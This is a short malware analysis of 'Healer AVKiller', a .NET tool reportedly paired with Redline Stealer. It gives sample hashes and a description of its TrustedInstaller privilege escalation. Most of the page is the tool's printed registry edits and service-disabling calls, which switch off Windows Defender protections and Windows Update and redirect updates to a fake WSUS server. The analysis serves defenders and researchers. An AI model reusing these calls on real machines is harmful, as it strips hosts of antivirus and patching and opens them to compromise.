Healer AVKiller

• Overview
• Samples
• Analysis
  • Windows Defender Targets

Overview

This small .NET hacking tool is often deployed along side Redline Stealer and is used to disable antivirus.

Samples

• 976ba54ff3f8ab4c1d6fe5629460b1fc42106495ddb3151b52951030069b6d47 UnpacMe Analysis
• 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 UnpacMe Analysis
• a4f91172441b827b1e0cc6d7fb58d904fb5dd3bca64f08be24c431db2fdcca6d UnpacMe Analysis

Analysis

When launched the binary first elevates to SYSTEM using token impersonation with the winlogon token, then it migrates to TrustedInstaller using the TrustedInstaller service token. With TrustedInstaller permissions it gains full access to the protected registry keys and services such as those used by Windows Defender. This is a well documented elevation tactic that is decribed in the 2017 blog post The Art of Becoming TrustedInstaller.

Windows Defender Targets

The following registry keys and services are dissabled.

Program.DisableService("WinDefend");
Program.RegistryEdit("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableIOAVProtection", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableRealtimeMonitoring", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\Notifications", "DisableNotifications", "1");
Program.DisableService("wuauserv");
Program.DisableService("WaaSMedicSvc");
Program.DisableService("UsoSvc");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AUOptions", "2");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AutoInstallMinorUpdates", "0");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoUpdate", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoRebootWithLoggedOnUsers", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "UseWUServer", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "DoNotConnectToWindowsUpdateInternetLocations", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUStatusServer", "server.wsus");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUServer", "server.wsus");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "UpdateServiceUrlAlternate", "server.wsus");